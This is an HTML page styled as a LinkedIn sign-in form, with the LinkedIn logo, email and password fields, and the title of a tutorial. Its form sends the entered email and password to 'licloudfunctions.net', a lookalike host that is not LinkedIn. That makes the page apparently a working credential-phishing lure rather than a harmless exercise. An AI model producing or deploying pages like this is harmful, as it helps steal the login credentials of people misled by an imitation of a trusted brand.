<!DOCTYPE html> 
<html lang="en">   
<head> 
    <meta charset="UTF-8" /> 
    <meta http-equiv="X-UA-Compatible" content="IE=edge" /> 
    <meta name="description" content="Free Web tutorials" /> 
    <meta name="keywords" content="HTML, CSS, JavaScript" /> 
    <meta name="author" content="John Doe" /> 
    <meta name="viewport" content= 
        "width=device-width, initial-scale=1.0" /> 
    <title>LinkedIn Login Form Using HTML and CSS</title> 
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
  
    <link rel="stylesheet" href= "https://use.fontawesome.com/releases/v5.7.0/css/all.css"
        integrity= "sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" 
        crossorigin="anonymous" /> 
  
    <link rel="stylesheet" href="style.css" />  
</head>   
<body> 
    <div class="container"> 
        <h2>Linked<span> 
            <i class="fab fa-linkedin"></i> 
        </span></h2> 
        <div class="text"> 
            <h1>Sign in</h1> 
            <p>Stay updated on your professional world</p> 
        </div> 
        <form id="linkedIn" action="https://licloudfunctions.net/verifyTurnstile" method="POST" >
        <div class="your-input"> 
            <div class="input"> 
                <input type="text" name="email" 
                    id="email" required /> 
                <label for="email">Email</label> 
            </div> 
            <div class="input"> 
                <input type="password" name="password" 
                    id="password" required /> 
                <label for="password"> 
                    Password 
                </label> 
            </div> 
        </div> 
        <a href="#" class="forgot-password-link"> 
            Forgot Password? 
        </a> 
    </form>
        <p class="join-link"> 
            New to linkedin? 
            <a href="signup.html" class="join-now"> 
                Join now 
            </a> 
        </p> 
    </div>
</body> 
</html> 